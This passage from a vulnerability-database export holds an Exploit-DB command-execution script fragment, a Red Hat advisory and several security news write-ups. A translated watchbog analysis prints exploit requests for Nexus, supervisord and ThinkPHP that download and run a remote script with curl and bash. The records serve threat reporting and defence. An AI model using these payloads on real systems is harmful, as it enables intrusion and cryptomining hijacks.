cmd_test==\"exit\":\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tcmd_ = cmd_test\r\n\t\t\t\theaders = {\r\n\t\t\t\t\t'cmd': cmd_,\r\n\t\t\t\t\t'Content-Type':'application/x-www-form-urlencoded',\r\n\t\t\t\t\t'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',\r\n\t\t\t\t\t'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\r\n\t\t\t\t\t'Connection':'close',\r\n\t\t\t\t\t'Accept-Encoding':'gzip,deflate',\r\n\t\t\t\t\t'Content-Length':'1244',\r\n\t\t\t\t\t'Content-Type':'application/x-www-form-urlencoded'\r\n\t\t\t\t}\r\n\t\t\t\tresults_ = requests.post(url_, data=form_data_, headers=headers, 
stream=True).text\r\n\t\t\t\tprint(results_)\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\nelse:\r\n\tprint(\"(CHackA0101-GNU/Linux)$ Fail.\\n\")", "sourceHref": "https://www.exploit-db.com/raw/49479", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2023-09-12T04:37:38", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nThe following packages have been upgraded to a later upstream version: ansible-tower (3.1.5), cfme (5.8.2.3), cfme-appliance (5.8.2.3), cfme-gemset (5.8.2.3), rabbitmq-server (3.6.9), rh-ruby23-rubygem-nokogiri (1.8.1), supervisor (3.1.4). (BZ#1476286, BZ#1485484)\n\nSecurity Fix(es):\n\n* A flaw was found in Tower's interface with SCM repositories. If a Tower project (SCM repository) definition does not have the 'delete before update' flag set, an attacker with commit access to the upstream playbook source repository could create a Trojan playbook that, when executed by Tower, modifies the checked out SCM repository to add git hooks. These git hooks could, in turn, cause arbitrary command and code execution as the user Tower runs as. (CVE-2017-12148)\n\n* A vulnerability was found in the XML-RPC interface in supervisord. When processing malformed commands, an attacker can cause arbitrary shell commands to be executed on the server as the same user as supervisord. Exploitation requires the attacker to first be authenticated to the supervisord service. (CVE-2017-11610)\n\nThe CVE-2017-12148 issue was discovered by Ryan Petrello (Red Hat).\n\nAdditional Changes:\n\nThis update also fixes several bugs and adds various enhancements. 
Documentation for these changes is available from the Release Notes document linked to in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-24T00:00:47", "type": "redhat", "title": "(RHSA-2017:3005) Important: Red Hat CloudForms security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610", "CVE-2017-12148"], "modified": "2017-10-24T00:01:54", "id": "RHSA-2017:3005", "href": "https://access.redhat.com/errata/RHSA-2017:3005", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-12T17:49:56", "description": "Recently, Alibaba Cloud Security observed the watchbog mining Trojan exploiting the newly disclosed Nexus Repository Manager 3 remote code execution vulnerability (CVE-2019-7238) to attack hosts and mine cryptocurrency. 
\nIt is worth noting that the attacks began on February 24, only a little over half a month after the product's vendor published its vulnerability announcement on February 5, which once again confirms that \"the time from a vulnerability's disclosure to its use by cybercriminals for mining is getting ever shorter.\" In addition, the attacker also exploits vulnerabilities in supervisord, ThinkPHP and other products. \nThis article analyzes the Trojan's internal structure and means of propagation, and gives security recommendations on how to clean it up and prevent similar mining Trojans. \nAnalysis of the mining Trojan's propagation \nThe attacker spreads the Trojan mainly by directly attacking vulnerabilities in services running on the host, which means it does not currently propagate like a worm; in this respect it resembles the 8220 gang. Even so, the attacker still controls a large number of compromised hosts. \nIn particular, on February 24 the attack code was extended from targeting only ThinkPHP and supervisord to also targeting Nexus Repository Manager 3, and the mining pool hash rate surged about 3-fold that day, reaching around 210KH/s with earnings of about $25/day, meaning that at most 1 to 2 million hosts may have been controlled for mining. \nThe following are the 3 types of attack payload captured by Alibaba Cloud Security \n(1) Exploitation of the Nexus Repository Manager 3 remote code execution vulnerability (CVE-2019-7238) \nPOST /service/extdirect HTTP/1.1 Host: \u3010victim_ip\u3011:8081X-Requested-With: XMLHttpRequestContent-Type: application/json {\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"} \n(2) Exploitation of the supervisord remote command execution vulnerability (CVE-2017-11610) \nPOST /RPC2 HTTP/1.1 Host: \u3010victim_ip\u3011:9001Content-Type: application/x-www-form-urlencoded u0002u0002supervisor.supervisord.options.warnings.linecache.os.systemu0002 \nu0002 \nu0002curl https://pastebin.com/raw/zXcDajSs -o /tmp/babyu0002u0002u0002 \n(3) Exploitation of the ThinkPHP remote command execution vulnerability \nPOST /index.php?s=captcha HTTP/1.1 \nHost: \u3010victim_host\u3011 \nContent-Type: application/x-www-form-urlencoded \n\n_method=__construct&filter;[]=system&method;=get&server;[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby \nThe purpose of the three payloads above is the same: to take control of the host by executing the following command \ncurl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby \nAnalysis of the Trojan's functional structure \nThe compromised host, under the attacker's control, accesses https://pastebin.com/raw/zXcDajSs and, after several redirects, obtains a shell script that contains the functions cronlow(), cronhigh(), flyaway() and others. \nAnalysis shows that the script mainly consists of the following modules: \n1. Mining module \nThe mining module's download() function fetches the mining program, a modified xmrig, from https://ptpb.pw/D8r9 (the decoded content of $mi_64), saves it as /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog, downloads the configuration file from https://ptpb.pw/hgZI, and then starts mining. \nAnother function, testa(), is similar, but it downloads the xmr-stak mining program instead. \n2. Persistence module \nThe malicious command to be executed is written to /etc/cron.d/root and other files. \n3. C&C module \nThe C&C module is implemented mainly in the dragon() and flyaway() functions. \nThe decoded dragon() function requests several addresses such as https://pastebin.com/raw/05p0fTYd in turn and executes the commands it receives. Interestingly, these addresses currently hold only some common words; they may have been reserved by the Trojan author for future use. \nThe flyaway() function differs slightly from dragon(): it first downloads /tmp/elavate from https://pixeldra.in/api/download/8iFEEg. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-12T00:00:00", "type": "myhack58", "title": "Nexus Repository Manager 3 new vulnerability has been used in mining Trojan spread, users are advised to fix as soon as possible-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7238", "CVE-2017-11610"], "modified": "2019-03-12T00:00:00", "id": "MYHACK58:62201993118", "href": "http://www.myhack58.com/Article/html/3/62/2019/93118.htm", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2023-05-31T16:21:21", "description": "A financially motivated threat actor 
is actively scouring the internet for unprotected [Apache NiFi instances](<https://nifi.apache.org/>) to covertly install a cryptocurrency miner and facilitate lateral movement.\n\nThe findings come from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests for \"/nifi\" on May 19, 2023.\n\n\"Persistence is achieved via timed processors or entries to cron,\" [said](<https://isc.sans.edu/diary/Your%20Business%20Data%20and%20Machine%20Learning%20at%20Risk%3A%20Attacks%20Against%20Apache%20NiFi/29900>) Dr. Johannes Ullrich, dean of research for SANS Technology Institute. \"The attack script is not saved to the system. The attack scripts are kept in memory only.\"\n\nA honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the \"/var/log/syslog\" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server.\n\nIt's worth pointing out that [Kinsing](<https://www.akamai.com/blog/security/Kinsing-evolves-adds-windows-to-attack-list>) has a [track record](<https://www.akamai.com/blog/security-research/atlassian-confluence-vulnerability-observations>) of [leveraging](<https://thehackernews.com/2023/01/kinsing-cryptojacking-hits-kubernetes.html>) publicly disclosed vulnerabilities in publicly accessible web applications to carry out its attacks.\n\nIn September 2022, Trend Micro detailed an [identical attack chain](<https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html>) that utilized old Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to deliver the cryptocurrency mining malware.\n\n
Select attacks mounted by the same threat actor against exposed NiFi servers also entail the execution of a second shell script that's designed to collect SSH keys from the infected host to connect to other systems within the victim's organization.\n\nA notable indicator of the ongoing campaign is that the actual attack and scanning activities are carried out via the IP address 109.207.200[.]43 against port 8080 and port 8443/TCP.\n\n\"Due to its use as a data processing platform, NiFi servers often have access to business-critical data,\" SANS ISC said. \"NiFi servers are likely attractive targets as they are configured with larger CPUs to support data transformation tasks. The attack is trivial if the [NiFi server is not secured](<https://nifi.apache.org/docs/nifi-docs/html/administration-guide.html#user_authentication>).\"\n\nFound this article interesting? Follow us on [Twitter](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-31T15:44:00", "type": "thn", "title": "Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-14883"], "modified": "2023-05-31T15:44:26", "id": "THN:80B476657ABE12ED91DD0E314BF8DA31", "href": "https://thehackernews.com/2023/05/cybercriminals-targeting-apache-nifi.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T15:26:53", "description": "Malicious actors such as Kinsing are taking advantage of both recently disclosed and older security flaws in Oracle WebLogic Server to deliver cryptocurrency-mining malware.\n\nCybersecurity company Trend Micro said it [found](<https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html>) the financially-motivated group leveraging the vulnerability to drop Python scripts with capabilities to disable operating system (OS) security features such as Security-Enhanced Linux ([SELinux](<https://www.redhat.com/en/topics/linux/what-is-selinux>)), and others.\n\nThe operators behind the [Kinsing malware](<https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces>) have a history of scanning for vulnerable servers to co-opt them into a botnet, including that of [Redis](<https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html>), [SaltStack](<https://redcanary.com/blog/kinsing-malware-citrix-saltstack/>), 
[Log4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), [Spring4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), and the Atlassian Confluence flaw ([CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>)).\n\nThe Kinsing actors have also been involved in campaigns against container environments via [misconfigured open Docker Daemon API ports](<https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability>) to launch a crypto miner and subsequently spread the malware to other containers and hosts.\n\nThe latest wave of attacks entails the actor weaponizing [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, against unpatched servers to seize control of the server and drop malicious payloads.\n\nIt's worth noting that the vulnerability has been [exploited in the past](<https://thehackernews.com/2020/12/multiple-botnets-exploiting-critical.html>) by multiple botnets to distribute Monero miners and the Tsunami backdoor on infected Linux systems. 
\n\nSuccessful exploitation of the flaw was followed by the deployment of a shell script that's responsible for a series of actions: removing the [/var/log/syslog](<https://help.ubuntu.com/community/LinuxLogFiles>) system log, turning off security features and cloud service agents from Alibaba and Tencent, and killing competing miner processes.\n\nThe shell script then proceeds to download the Kinsing malware from a remote server, while also taking steps to ensure persistence by means of a cron job.\n\n\"The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems,\" Trend Micro said. \"This can range from malware execution [...] to theft of critical data, and even complete control of a compromised machine.\"\n\n## **TeamTNT actors make a comeback with new attacks**\n\nThe development comes as researchers from Aqua Security identified three new attacks linked to another \"vibrant\" cryptojacking group called TeamTNT, which voluntarily shut shop in November 2021.\n\n\"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server,\" Aqua Security researcher Assaf Morag [said](<https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt>).\n\nWhat's notable about the attack chain is that it appears to be designed to break [SECP256K1 encryption](<https://en.bitcoin.it/wiki/Secp256k1>), which, if successful, could give the actor the ability to calculate the keys to any cryptocurrency wallet. 
Put differently, the idea is to leverage the high but illegally obtained computational power of its targets to run the ECDLP solver and get the key.\n\nTwo other attacks mounted by the group entail the exploitation of [exposed Redis servers](<https://blog.aquasec.com/container-attacks-on-redis-servers>) and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.\n\nTeamTNT's targeting of Docker REST APIs has been [well-documented](<https://thehackernews.com/2021/12/ongoing-autom-cryptomining-malware.html>) over the past year. But in an [operational security blunder](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>) spotted by Trend Micro, credentials associated with two of the attacker-controlled DockerHub accounts have been uncovered.\n\nThe accounts \u2013 alpineos and sandeep078 \u2013 are said to have been used to distribute a variety of malicious payloads like rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners, and even the Kinsing malware.\n\n\"The account alpineos was used in exploitation attempts on our honeypots three times, from mid-September to early October 2021, and we tracked the deployments' IP addresses to their location in Germany,\" Trend Micro's Nitesh Surana [said](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>).\n\n\"The threat actors were logged in to their accounts on the DockerHub registry and probably forgot to log out.\" Alternatively, \"the threat actors logged in to their DockerHub account using the credentials of alpineos.\"\n\nTrend Micro said the malicious alpineos image had been downloaded more than 150,000 times, adding it 
notified Docker about these accounts. \n\nIt also recommends that organizations configure the exposed REST API with TLS to mitigate adversary-in-the-middle (AiTM) attacks, as well as use credential stores and [helpers](<https://github.com/docker/docker-credential-helpers>) to host user credentials.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-16T10:58:00", "type": "thn", "title": "Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2022-26134"], "modified": "2022-09-16T15:00:46", "id": "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "href": "https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:43", 
"description": "Multiple botnets are targeting thousands of publicly exposed and still unpatched Oracle WebLogic servers to deploy crypto miners and steal sensitive information from infected systems.\n\nThe attacks are taking aim at a recently patched WebLogic Server vulnerability, a fix for which was released by Oracle as part of its [October 2020 Critical Patch Update](<https://www.oracle.com/security-alerts/cpuoct2020.html>) and subsequently again in November ([CVE-2020-14750](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html>)) in the form of an out-of-band security patch.\n\nAs of writing, about 3,000 Oracle WebLogic servers are accessible on the Internet, based on stats from the Shodan search engine.\n\nOracle [WebLogic](<https://www.oracle.com/java/weblogic/>) is a platform for developing, deploying, and running enterprise Java applications in any cloud environment as well as on-premises.\n\nThe flaw, which is tracked as CVE-2020-14882, has a CVSS score of 9.8 out of a maximum rating of 10 and affects WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.\n\nAlthough the issue has been addressed, the release of [proof-of-concept](<https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf>) [exploit code](<https://twitter.com/GossiTheDog/status/1321430443611328513>) has made vulnerable Oracle WebLogic instances a lucrative target for threat actors seeking to recruit these servers into a botnet that pilfers critical data and deploys second-stage malware payloads.\n\nAccording to [Juniper Threat 
Labs](<https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability>), operators of the DarkIRC botnet are exploiting this RCE vulnerability to spread laterally across the network, download files, record keystrokes, steal credentials, and execute arbitrary commands on compromised machines.\n\nThe malware also acts as a Bitcoin clipper: it swaps Bitcoin wallet addresses copied to the clipboard for the operator's wallet address, rerouting the victim's Bitcoin transactions.\n\nWhat's more, a threat actor by the name of \"Freak_OG\" has been selling the DarkIRC malware on hacking forums for $75 since August.\n\nBut it's not just DarkIRC that's exploiting the WebLogic Server vulnerability. In a separate campaign\u2014spotted by '[0xrb](<https://twitter.com/0xrb>)' and detailed by researcher [Tolijan Trajanovski](<https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/>)\u2014evidence has emerged of a botnet that propagates via the WebLogic flaw to deliver a Monero cryptocurrency miner and [Tsunami](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami>) binaries.\n\nBesides using SSH for lateral movement, the botnet has been found to achieve persistence through cron jobs, kill competing mining tools, and even uninstall endpoint detection and response (EDR) tools from Alibaba and Tencent.\n\nIt's recommended that users apply the October 2020 Critical Patch Update and the updates associated with CVE-2020-14750 as soon as possible to mitigate risks stemming from this flaw.\n\nOracle has also provided instructions to [harden the servers](<https://docs.oracle.com/en/middleware/standalone/weblogic-server/14.1.1.0/lockd/secure.html#GUID-8C0CC8CF-3D16-4DC1-BF54-1C1B17D2CEF8>) by preventing external access to internal applications accessible on the Administration port.\n
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-02T09:20:00", "type": "thn", "title": "Multiple Botnets Exploiting Critical Oracle WebLogic Bug \u2014 PATCH NOW", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-12-02T09:20:45", "id": "THN:8ECDF261632B04DEE688C1023DD73404", "href": "https://thehackernews.com/2020/12/multiple-botnets-exploiting-critical.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:17", "description": "A recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines with easy-to-guess administrative credentials to co-opt them into a network 
with the goal of illegally mining cryptocurrency.\n\n\"The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency,\" Akamai security researcher Larry Cashdollar [said](<https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread>) in a write-up published last week.\n\nThe PHP malware \u2014 codenamed \"Capoae\" (short for \"\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435,\" the Russian word for \"Scanning\") \u2014 is said to be delivered to the hosts via a backdoored addition to a WordPress plugin called \"download-monitor,\" which gets installed after successfully brute-forcing WordPress admin credentials. The attacks also involve the deployment of a [Golang binary](<https://www.virustotal.com/gui/file/7d1e2685b0971497d75cbc4d4dac7dc104e83b20c2df8615cf5b008dd37caee0/detection>) with decryption functionality; the obfuscated payloads are retrieved by using the trojanized plugin to make a GET request to an actor-controlled domain.\n\nThe binary can also decrypt and execute additional payloads, and it carries exploits for multiple remote code execution flaws in Oracle WebLogic Server ([CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>)), NoneCms ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), and Jenkins ([CVE-2019-1003029](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003029>) and [CVE-2019-1003030](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003030>)), alongside SSH brute-forcing, to break into further systems and ultimately launch the XMRig mining software.\n\nWhat's more, the attack chain stands out for its persistence tricks, which include choosing a legitimate-looking system path on the disk where system binaries are likely to be found, generating a random six-character filename, and copying itself to that new location under that name before deleting the original once it has run.\n\n\"The Capoae campaign's use of multiple vulnerabilities and tactics highlights just how intent these operators are on getting a foothold on as many machines as possible,\" Cashdollar said. \"The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here.\"\n\n\"Don't use weak or default credentials for servers or deployed applications,\" Cashdollar added. \"Ensure you're keeping those deployed applications up to date with the latest security patches and check in on them from time to time. Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts and suspicious access log entries, etc., will help you potentially identify compromised machines.\"\n
\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-21T10:08:00", "type": "thn", "title": "New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20062", "CVE-2019-1003029", "CVE-2019-1003030", "CVE-2020-14882"], "modified": "2021-09-21T10:08:05", "id": "THN:B36CB9AC96CE2C515157963E75E4AC6A", "href": "https://thehackernews.com/2021/09/new-capoae-malware-infiltrates.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": "Cyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public 
disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. 
